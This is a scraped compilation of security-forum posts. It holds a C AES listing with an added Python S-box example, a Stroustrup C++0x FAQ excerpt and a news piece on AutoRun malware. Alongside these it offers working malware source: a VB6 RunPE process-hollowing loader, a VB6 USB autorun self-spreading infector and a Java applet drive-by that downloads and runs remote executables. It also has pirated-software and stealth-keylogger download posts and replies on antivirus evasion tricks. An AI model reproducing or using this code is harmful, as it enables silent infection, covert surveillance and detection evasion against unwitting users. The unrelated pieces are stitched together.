    aes_addroundkey(ctx, 0);

    // copy state to output
    for(i = 0; i < 16; i++)
        output[i] = ctx->state[i & 0x03][i >> 2];
}

void aes_free_ctx(aes_ctx_t *ctx)
{
    free(ctx);
}

int main(int argc, char *argv[])
{
    unsigned char key[KEY_128] = "uber strong key!";
    unsigned char ptext[16] = "Attack at dawn!";
    unsigned char ctext[16];
    unsigned char decptext[16];
    aes_ctx_t *ctx;

    init_aes();
    ctx = aes_alloc_ctx(key, sizeof(key));
    if(!ctx) {
        perror("aes_alloc_ctx");
        return EXIT_FAILURE;
    }

    aes_encrypt(ctx, ptext, ctext);
    aes_decrypt(ctx, ctext, decptext);
    puts(decptext);

    aes_free_ctx(ctx);
    return EXIT_SUCCESS;
}
```

In the attached zip you will also find the compiled ELF binary.

Download (an account may be required): http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=2875

Source: [C] AES Implementation - rohitab.com - Forums
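The GF(2^8) arithmetic that the AES Explained post above calls "the math behind AES", and the table generation this listing performs at start-up, as an added example (not X-N2O's code): it builds the same log/antilog tables with generator x+1, derives the S-box from them with the affine transformation of FIPS-197, and checks the result against values from the specification, including the inverse-of-1 entry that the listing's original quick hack patched by hand.

```python
"""GF(2^8) log/antilog tables for generator x+1 and the AES S-box derived from
them, checked against FIPS-197 values. Added example, not the listing's code."""

RPOL = 0x11B    # x^8 + x^4 + x^3 + x + 1, the AES reduction polynomial
GEN = 0x03      # x + 1 generates the multiplicative group of GF(2^8)
SBOX_C = 0x63   # constant of the affine transformation (FIPS-197 eq. 5.1)


def gf_mul(a: int, b: int) -> int:
    """Shift-and-add multiplication modulo RPOL (what the listing's aes_mul_manual does)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= RPOL
        b >>= 1
    return r


def build_log_tables():
    """LOG[g^i] = i and ALOG[i] = g^i for i in 0..254, plus ALOG[255] = g^255 = 1."""
    log, alog = [0] * 256, [0] * 256
    g = 1
    for i in range(255):
        log[g] = i
        alog[i] = g
        g = gf_mul(g, GEN)
    # The C listing originally stopped here and left ilogt[255] unset; that slot is
    # exactly what inv(1) = ALOG[255 - LOG[1]] = ALOG[255] reads, hence its S-Box[1] hack.
    alog[255] = g   # g is back to 1 after 255 multiplications
    return log, alog


LOG, ALOG = build_log_tables()


def gf_mul_table(a: int, b: int) -> int:
    """Table-driven multiplication, the listing's aes_mul macro."""
    if a == 0 or b == 0:
        return 0
    return ALOG[(LOG[a] + LOG[b]) % 255]


def gf_inv(a: int) -> int:
    """Multiplicative inverse via the tables; 0 maps to 0 by convention."""
    return 0 if a == 0 else ALOG[255 - LOG[a]]


def sbox(a: int) -> int:
    """S-box: multiplicative inverse followed by the affine transformation of eq. 5.1."""
    inv = gf_inv(a)
    s = 0
    for i in range(8):
        bit = ((inv >> i) ^ (inv >> ((i + 4) % 8)) ^ (inv >> ((i + 5) % 8))
               ^ (inv >> ((i + 6) % 8)) ^ (inv >> ((i + 7) % 8)) ^ (SBOX_C >> i))
        s |= (bit & 1) << i
    return s


def tables_consistent() -> bool:
    """Cross-check: table multiplication equals shift-and-add for every pair,
    every non-zero element times its inverse is 1, and the S-box is a bijection."""
    for a in range(256):
        for b in range(256):
            if gf_mul_table(a, b) != gf_mul(a, b):
                return False
        if a and gf_mul(a, gf_inv(a)) != 1:
            return False
    return len({sbox(a) for a in range(256)}) == 256
```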
-
[VB6] RunPe + CallApiByName (JunPE)
Product: JunPE
Description: RunPe + CallApiByName
Author: Jhonjhon_123 - [J.J.G.P]

```vb
Option Explicit
' ******************************************************************************************************************************
'
' --- Author: Jhonjhon_123 (Jhon Jairo Pro Developer)
' --- Description: RunPe + CallApiByName
' --- Distribution: Free
' --- Terms of use:
' ---   Commercial use prohibited.
' ---   Do not remove the credits.
'
' --- Functions:
' ---   IniciarDDLL()
' -       Initializes the configuration
'
' ---   Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
' -       RunPE
' *       sName: path to the exe
' *       bBytes: bytes to execute
'
' ******************************************************************************************************************************

Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Dim bMoveMem(36) As Byte

Public Sub IniciarDDLL()
    Dim vTMP As Variant
    Dim D As Long
    For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, _
                           &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, _
                           &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20)
        bMoveMem(D) = CByte(vTMP): D = D + 1
    Next
End Sub

'By Cobein
Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    On Error Resume Next
    Dim lPtr As Long
    Dim bvASM(&HEC00& - 1) As Byte
    Dim i As Long
    Dim lMod As Long

    lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
    If lMod = 0 Then Exit Function

    lPtr = VarPtr(bvASM(0))
    RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2
    For i = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1
        RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4
    Next
    RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1
    RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1
    Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function

' By Strike Bot
Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long)
    Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0)
End Sub

' By Jhonjhon_123
Public Sub ExecuteBytes(sName As String, bBytes() As Byte)
    On Error Resume Next
    Dim bIdh(63) As Byte    ' IMAGE_DOS_HEADER
    Dim bInh(247) As Byte   ' IMAGE_NT_HEADERS
    Dim bIsh(39) As Byte    ' IMAGE_SECTION_HEADER
    Dim bPi(15) As Byte     ' PROCESS_INFORMATION
    Dim bSi(67) As Byte     ' STARTUPINFO
    Dim bCtx(203) As Byte   ' CONTEXT86
    Dim e_lfanew As Long
    Dim ImageBase As Long
    Dim hProcess As Long
    Dim hThread As Long
    Dim SizeOfImage As Long
    Dim SizeOfHeaders As Long
    Dim AddressOfEntryPoint As Long
    Dim NumberOfSections As Integer
    Dim VirtualAddress As Long
    Dim PointerToRawData As Long
    Dim SizeOfRawData As Long
    Dim Ebx As Long
    Dim Eax As Long
    Dim lTemp As Long
    Dim D As Long

    lTemp = 68
    MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4&
    lTemp = &H10007
    MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4&
    MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64&
    MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4&
    MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248&
    MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4&
    MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4&
    MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4&
    MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4&
    MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2&

    Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0)))
    MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4&
    MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4&

    Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase)
    Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40)
    Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0)

    For D = 0 To NumberOfSections - 1
        MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40&
        MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4&
        MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4&
        MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4&
        Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0)
    Next

    Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0)))
    MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4&
    Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0)
    lTemp = ImageBase + AddressOfEntryPoint
    MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4&
    Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0)))
    Call Call_("kernel32", "ResumeThread", hThread)
End Sub
```

Source: RunPe + CallApiByName (JunPE)
-
[VB6] Infect USB
Author: mikeh18

Hello all, here's some modified code I made to detect + infect USB drives using autorun.

```vb
Sub Main()
    On Error Resume Next
    'Object and Strings
    Dim WMIService As Object, USBDrives As Object, USBFound As Object, USB As String, USBCount As String 'Objects
    Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'Open WMIService
    Set USBDrives = WMIService.ExecQuery("Select * from Win32_LogicalDisk") 'Look For Computer Drives drives
    For Each USBFound In USBDrives 'Look for all our drives
        If USBFound.DriveType = 2 Then 'If drivetype is USB
            USB = USBFound.Name 'Set USB as New USB-name
            USBCount = USBCount & " - " & USBFound.Name 'Add USB name to USB-count
        End If
        If USB = "" Then GoTo volgende 'If its not an USB-Drive then goto Next
        FileCopy App.Path & "\" & App.EXEName & ".exe", USB & "System.exe" 'Copy File to New USB Drive
        Open USB & "autorun.inf" For Output As #1 'Create a Autorun file
        Print #1, "[autorun]" 'Put Right Settings in it
        Print #1, "open=System.exe" 'Put Our exe-name in It
        Close #1 'Close the Autorun File
        SetAttr USB & "System.exe", vbHidden ' vbHidden 'Hide our Exe File
        SetAttr USB & "autorun.inf", vbHidden 'Hide the Autorun File
volgende: 'Next
    Next 'Search for more USB drives
    MsgBox "USB Drives: " & USB & vbNewLine & "Successfull Invected!", vbInformation, "USB Infect" 'Msg When Done
    End
End Sub
```

Mikeh18

Source: [VB6] Infect USB
-
Java Drive-By - Source Code
Nu11

So umm there isn't any java forum and it's not worth making one, so I'm posting it here. The source is completely commented & compiles with the latest java.

Java Source:

import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;
import java.security.AccessControlException;
import java.util.ArrayList;

// Change Exploit to what you want users to see as your Applet Name
@SuppressWarnings("serial")
public class Exploit extends Applet {

    // Same here
    public Exploit() {
    }

    public String getContents(File aFile) {
        StringBuilder contents = new StringBuilder();
        try {
            BufferedReader input = new BufferedReader(new FileReader(aFile));
            try {
                String line = null; // not declared within while loop
                while ((line = input.readLine()) != null) {
                    contents.append(line);
                    contents.append(System.getProperty("line.separator"));
                }
            } finally {
                input.close();
            }
        } catch (IOException ex) {
            ex.printStackTrace();
        }
        return contents.toString();
    }

    // Fetch the first line of a remote file (used for config.ini)
    public String getConfig(String link) {
        try {
            URLConnection url = null;
            BufferedReader in = null;
            url = new URL(link).openConnection();
            in = new BufferedReader(new InputStreamReader(url.getInputStream()));
            String str = in.readLine();
            if (in != null) {
                in.close();
            }
            return str;
        } catch (final IOException e) {
        }
        return null;
    }

    // Fetch all lines of a remote file (used for files.ini and urls.ini)
    public ArrayList<String> getConfigArray(String link) {
        URLConnection url = null;
        String line;
        ArrayList<String> file = new ArrayList<String>();
        try {
            url = new URL(link).openConnection();
            BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream()));
            while ((line = in.readLine()) != null)
                file.add(line);
            if (in != null) {
                in.close();
            }
            return file;
        } catch (final IOException e) {
        }
        return null;
    }

    public ArrayList<String> loadFile(String fileName) {
        if ((fileName == null) || fileName.isEmpty())
            throw new IllegalArgumentException();
        String line;
        ArrayList<String> file = new ArrayList<String>();
        try {
            BufferedReader in = new BufferedReader(new FileReader(fileName));
            if (!in.ready())
                throw new IOException();
            while ((line = in.readLine()) != null)
                file.add(line);
            in.close();
        } catch (IOException e) {
            System.out.println(e);
            return null;
        }
        return file;
    }

    // Main Method
    public void start() throws AccessControlException {
        String userdir = System.getProperty("user.home");
        String configs = "config.ini";
        String urlss = "urls.ini";
        String filess = "files.ini";
        // FULL PATH TO YOUR WEBSITE HERE (WHERE THE JAR IS GOING TO BE PLACED)
        String mainURL = "http://site.com/";
        // ---------------------- Do not touch anything below ----------------------
        // try {
        // ---------------------------- FILE 1 ----------------------------
        if (getConfig(mainURL + configs).contains("1") || getConfig(mainURL + configs).contains("2")
                || getConfig(mainURL + configs).contains("3") || getConfig(mainURL + configs).contains("4")) {
            String fname = "\\" + getConfigArray(mainURL + filess).get(0);
            String fpath = userdir.concat(fname);
            final String locationDownload = getConfigArray(mainURL + urlss).get(0);
            download(locationDownload, fpath);
            final Runtime run = Runtime.getRuntime();
            try {
                run.exec(fpath);
            } catch (final IOException e) {
            }
        }
        // ---------------------------- FILE 2 ----------------------------
        if (getConfig(mainURL + configs).contains("2") || getConfig(mainURL + configs).contains("3")
                || getConfig(mainURL + configs).contains("4")) {
            String fname2 = "\\" + getConfigArray(mainURL + filess).get(1);
            final Runtime run = Runtime.getRuntime();
            String fpath2 = userdir.concat(fname2);
            final String locationDownload2 = getConfigArray(mainURL + urlss).get(1);
            download(locationDownload2, fpath2);
            try {
                run.exec(fpath2);
            } catch (final IOException e) {
            }
        }
        // ---------------------------- FILE 3 ----------------------------
        if (getConfig(mainURL + configs).contains("3") || getConfig(mainURL + configs).contains("4")) {
            String fname3 = "\\" + getConfigArray(mainURL + filess).get(2);
            final Runtime run = Runtime.getRuntime();
            String fpath3 = userdir.concat(fname3);
            final String locationDownload3 = getConfigArray(mainURL + urlss).get(2);
            download(locationDownload3, fpath3);
            try {
                run.exec(fpath3);
            } catch (final IOException e) {
            }
        }
        // ---------------------------- FILE 4 ----------------------------
        if (getConfig(mainURL + configs).contains("4")) {
            String fname4 = "\\" + getConfigArray(mainURL + filess).get(3);
            final Runtime run = Runtime.getRuntime();
            String fpath4 = userdir.concat(fname4);
            final String locationDownload4 = getConfigArray(mainURL + urlss).get(3);
            download(locationDownload4, fpath4);
            try {
                run.exec(fpath4);
            } catch (final IOException e) {
            }
        }
        // ------------------------------ END ------------------------------
        // } catch (AccessControlException e) {
        //     System.out.println("hi");
        // }
    }

    // Download address to localFileName, 1 KB at a time
    public void download(final String address, final String localFileName) {
        OutputStream out = null;
        URLConnection conn = null;
        InputStream in = null;
        try {
            final URL url = new URL(address);
            out = new BufferedOutputStream(new FileOutputStream(localFileName));
            conn = url.openConnection();
            in = conn.getInputStream();
            final byte[] buffer = new byte[1024];
            int numRead;
            while ((numRead = in.read(buffer)) != -1) {
                out.write(buffer, 0, numRead);
            }
        } catch (final Exception exception) {
        } finally {
            try {
                if (in != null) {
                    in.close();
                }
                if (out != null) {
                    out.close();
                }
            } catch (final IOException ioe) {
            }
        }
    }

    public void main(String args[]) {
        start();
    }

    public void stop() {
    }
}

Create the config.ini in notepad and just put a numeric value for the amount of exe's you want it to execute. If you're only having it dl/exec 1 file then for the value put 1.

Create the files.ini in notepad and just put the name of the file it's going to download; if you're hosting the file as blah.exe just put blah.exe.

Create the urls.ini and just put the full download link of whatever file you want it to download and execute.

Have fun.

Then:

<applet width='1' height='1' code='java.class' archive='java.jar'> </applet>

Source: Java Drive-By (Not Really), Full Source Code
-
RealVNC Enterprise v4.6.0+keygen

I haven't downloaded it, I don't know whether it's infected, run it at your own risk.

RealVNC Enterprise v4.6.0 Incl Keymaker-CORE | 5.85 MB

VNC® Enterprise Edition - A greatly enhanced version of VNC, developed for use in enterprises of all sizes. Designed and built from the ground up by the original inventors of VNC, Enterprise Edition provides secure, robust and easily-administered remote-control with a minimum of fuss. Existing Free Edition users considering upgrading may find this feature comparison useful. There is also a handy datasheet (pdf).

FEATURES :
Printing
Cross-Platform VNC Chat
Integrated Session Security [new]
System Authentication
One-Port HTTP & VNC
HTTP Proxy Support
Desktop Scaling
Cross-Platform Interoperability
File Transfer [new]
Integrated VNC Address Book
VNC Deployment Tool (Windows only)

Home: http://www.realvnc.com/products/enterprise/index.html
Download: http://www.filesonic.com/file/1204491664/RealVNC.Enterprise.v4.6.0.Incl.Keymaker-CORE.7z

Source: RealVNC Enterprise v4.6.0+keygen - r00tsecurity
-
Award Keylogger v2.6 (x86-x64) full

I haven't downloaded it, I haven't tried it, I don't know whether it's infected, run it at your own risk.

Award Keylogger v2.6 (x86-x64) | 9.36 MB

Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones.

FEATURES :
• New! Run keylogger as a Windows service
• Easy-to-use, even for beginners
• Absolutely invisible/stealth mode
• Logs accounts and passwords typed in the every application
• Logs message typed in all instant messengers
• Visual surveillance, support screenshots view
• Slide show for screenshots
• Captures the contents behind the asterisks
• Captures mouse clicks
• Logs websites visited
• Captures AOL/AIM/Yahoo/ICQ chats
• Keyword Detection and Notification
• Records contents of password protected web pages, including Web Mail messages
• Logs Windows Clipboard
• Sends log by e-mail
• Uploads ALL logs into the separate folders by FTP
• Invisible for the firewall program
• Invisible in the Windows startup list
• Monitors all users of the PC
• User friendly HTML file format for emailed logs
• Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List
• Records Windows 9.x/Me/2000/XP/VISTA logon passwords
• Intercepts DOS-box and Java-chat keystrokes
• Supports international keyboards
• External log viewer
• Supports printing of the log
• Optimized for Windows XP
• Exports log to HTML

INSTALL
1. Extract files with WinRAR
2. Install Application
3. Use the patch

Download: http://www.filesonic.vn/file/1199695194
or http://www.fileserve.com/file/KUETVaP
or http://bitshare.com/files/rwaig065/Award-Keylogger-v2.6--x86-x64-.rar.html

Source: Award Keylogger v2.6 (x86-x64) full - r00tsecurity
-
Windows XP, Vista AutoRun update reduces malware infections by 82 percent
February's "backport" of the Windows 7 feature worked like a charm, says Microsoft
By Gregg Keizer | Computerworld

Microsoft today credited a February security update for lowering AutoRun-abusing malware infection rates on Windows XP and Vista by as much as 82 percent since the start of the year.

Four months ago, Microsoft offered XP and Vista users an optional update -- which was later changed to automatically download and install -- that disabled AutoRun.

Microsoft changed AutoRun's behavior in Windows 7 to block automatic execution of files on a USB drive. It first backported the modifications to Windows XP and Vista in 2009. Until February, however, users had to manually seek out the update.

With the update in place, flash drives inserted into a PC running XP or Vista no longer offer the option to run programs. AutoRun's extinction does not affect CDs or DVDs, however.

The move has paid off in spades, said Microsoft today. "The infection rates for Windows XP and Vista went down ... pretty significantly, in fact," said Holly Stewart, a senior program manager with the MMPC (Microsoft Malware Protection Center), in a blog post Tuesday.

According to statistics compiled by the MMPC from data delivered by the Malicious Software Removal Tool (MSRT), a free utility that detects and deletes some attack code, infection rates of malware that spreads through AutoRun plummeted after the February update reached XP and Vista.

Since January 2011, the month before the AutoRun update shipped, infection rates of XP Service Pack 3 (SP3) -- the sole version still supported by Microsoft -- have dropped by 62 percent. Vista SP1's infection rate has fallen by 68 percent while Vista SP2's has plunged by 82 percent in the same period.

Microsoft will abandon support of Vista SP1 next month.

"That's a huge reduction," said Andrew Storms, director of security operations at nCircle Security. "Imagine if AutoRun was never invented."

Storms was talking about the fact that the Windows feature was abused by some of the highest-profile worms in the last two years, including Conficker and Stuxnet. The former relied on AutoRun -- among other propagation techniques -- to infect millions of PCs, while analysts believe the latter used AutoRun to infect Iranian computers associated with the country's uranium enrichment program.

Microsoft's Stewart also described an unanticipated side-effect of the update. "What was unexpected, is that there appears to have been a residual effect ... a 'secondhand smoke' kind of effect on adjacent systems that were already protected with proactive defenses," said Stewart, citing Microsoft's own security products, including the free Security Essentials and the for-a-fee, enterprise-grade Forefront line. "The infection attempts on these computers also went down immediately after the update was released."

In an interview Tuesday, Jerry Bryant, a group manager with the MSRC (Microsoft Security Response Center), said that the decrease in infection attempts -- ones stymied by a Microsoft antivirus signature -- was due to the AutoRun update preventing large numbers of primary infections. "We attribute the overall decline in infections to fewer systems trying to propagate using AutoRun," said Bryant.

In February, Microsoft noted that the AutoRun update would break the functionality of some USB drives. "Users who install this update will no longer receive a setup message that prompts them to install programs that are delivered by USB flash drives. Users will have to manually install the software," Microsoft warned in a security advisory at the time.

The company has also published the "Enable Autorun" tool that customers can deploy to disable the update's changes and revert to Windows XP's and Vista's earlier behavior.

Source: Windows XP, Vista AutoRun update reduces malware infections by 82 percent | Security - InfoWorld
-
Bypassing Anti-virus using Code Injection Technique
Nytro replied to Nytro's topic in Tutoriale in engleza
Probably anti-rootkit technology. I was watching Sysinternals videos and saw roughly how it works. It checks the files in a folder using the classic APIs, for example. Then the same check using raw access to the NTFS file system. If something is missing, clearly, it's hidden. That would be one idea. Anyway, there are many solutions, but very complicated ones. You can check for SSDT hooks, it's complicated. In the future I want to focus precisely on this area; I've started reading Windows Internals 5th Edition. For now I don't know very much myself either...
Bypassing Anti-virus using Code Injection Technique
Nytro replied to Nytro's topic in Tutoriale in engleza
Keeping an executable, for example, as a resource, as a section or anything else, and having that file not be detectable is trivial. I simply added 1 to each byte, turned 255 into 0, and it was no longer detectable. The detectable part is the loader, the code that loads the executable into memory, or the dropper, the piece of code in which the stub reads itself or copies itself to wherever, or the "Anti-****" parts... That's the hard part. One could make some attempts along the idea of encrypting the code section of an executable: it wouldn't have to be loaded into memory any more, only the code section would be modified at execution time, the entry point can stay the same, but the decryption code has to be added there, the section has to be MEM_WRITE, there are a few things that have to be done, but it works.
I had seen a video made by muts (Mati Aharoni) based on the same technique. I don't know how effective it is; it may be detected by modern heuristic scans. I wanted to make a packer on this idea, maybe I actually will, but I have some things on my plate for a couple of weeks.
-
You'll change your mind in time, when you see that there are other things besides what you do in high school... You only listed high-school subjects.
-
C++0x - the next ISO C++ standard

This document is written by and maintained by Bjarne Stroustrup. Constructive comments, corrections, references, and suggestions are of course most welcome. Currently, I'm working to improve completeness and clean up the references.

C++0x is the next ISO C++ standard. Currently a draft is available for comments. The previous (and current) standard is often referred to as C++98 or C++03; the differences between C++98 and C++03 are so few and so technical that they ought not concern users.

The final committee draft standard is currently (March 2010) being voted on by the national standards bodies. After that there will be more work before all comments have been addressed and the ISO bureaucracy satisfied. At the current stage of the proceedings, no features (even very minor ones) are expected to be added or removed.

The name "C++0x" is a relic of the days where I and others hoped for a C++08 or C++09. However, to minimize confusion, I'll keep referring to the upcoming C++ standard with the feature set defined here as C++0x. Think of 'x' as hexadecimal (most likely 'B', i.e. C++11).

If you have comments on C++0x, please find some member of your national standards body -- or a member of any standards body -- to send your comments to. That's now the only way and will ensure that the committee doesn't have to deal with many very similar comments. Remember, the committee consists of volunteers with limited time and resources.

All official documents relating to C++0x can be found at the ISO C++ committee's website. The official name of the committee is SC22 WG21.

Caveat: This FAQ will be under construction for quite a while. Comments, questions, references, corrections, and suggestions welcome.

Purpose

The purpose of this C++0x FAQ is
To give an overview of the new facilities (language features and standard libraries) offered by C++0x in addition to what is provided by the previous version of the ISO C++ standard.
To give an idea of the aims of the ISO C++ standards effort.
To present a user's view of the new facilities.
To provide references to allow for a more in depth study of features.
To name many of the individuals who contributed (mostly as authors of the reports they wrote for the committee). The standard is not written by a faceless organization.

Please note that the purpose of this FAQ is not to provide comprehensive discussion of individual features or a detailed explanation of how to use them. The aim is to give simple examples to demonstrate what C++0x has to offer (plus references). My ideal is "max one page per feature" independently of how complex a feature is. Details can often be found in the references.

Lists of questions

Here are some high-level questions
What do you think of C++0x?
When will C++0x be a formal standard?
When will compilers implement C++0x?
When will the new standard libraries be available?
What new language features will C++0x provide? (a list); see also the questions below
What new standard libraries will C++0x provide? (a list); see also the questions below
What were the aims of the C++0x effort?
What specific design aims guided the committee?
Where can I find the committee papers?
Where can I find academic and technical papers about C++0x? (a list)
Where else can I read about C++0x? (a list)
Are there any videos about C++0x? (a list)
Is C++0x hard to learn?
How does the committee operate?
Who is on the committee?
In which order should an implementer provide C++0x features?
Will there be a C++1x?
What happened to "concepts"?
Are there any features you don't like?
Questions about individual language features can be found here:
__cplusplus
alignments
attributes
atomic operations
auto (type deduction from initializer)
C99 features
enum class (scoped and strongly typed enums)
copying and rethrowing exceptions
constant expressions (generalized and guaranteed; constexpr)
decltype
defaulted and deleted functions (control of defaults)
delegating constructors
Dynamic Initialization and Destruction with Concurrency
explicit conversion operators
extended integer types
extern templates
for statement; see range for statement
suffix return type syntax (extended function declaration syntax)
in-class member initializers
inherited constructors
initializer lists (uniform and general initialization)
lambdas
local classes as template arguments
long long integers (at least 64 bits)
memory model
move semantics; see rvalue references
Inline namespace
Preventing narrowing
null pointer (nullptr)
PODs (generalized)
range for statement
raw string literals
right-angle brackets
rvalue references
Simple SFINAE rule
static (compile-time) assertions (static_assert)
template alias
template typedef; see template alias
thread-local storage (thread_local)
unicode characters
Uniform initialization syntax and semantics
unions (generalized)
user-defined literals
variadic templates

I often borrow examples from the proposals. In those cases: Thanks to the proposal authors. Many of the examples are borrowed from my own talks and papers.
Questions about individual standard library facilities can be found here:
abandoning a process
Improvements to algorithms
array
async()
atomic operations
Condition variables
Improvements to containers
function and bind
forward_list, a singly-linked list
future and promise
garbage collection ABI
hash_tables; see unordered_map
metaprogramming and type traits
Mutual exclusion
random number generators
regex, a regular expression library
scoped allocators
shared_ptr
smart pointers; see shared_ptr, weak_ptr, and unique_ptr
threads
Time utilities
tuple
unique_ptr
unordered_map
weak_ptr
system error

Below are the answers to the specific questions indexed above.

Tutorial: http://www2.research.att.com/~bs/C++0xFAQ.html
-
Something tells me it won't be long before you get banned...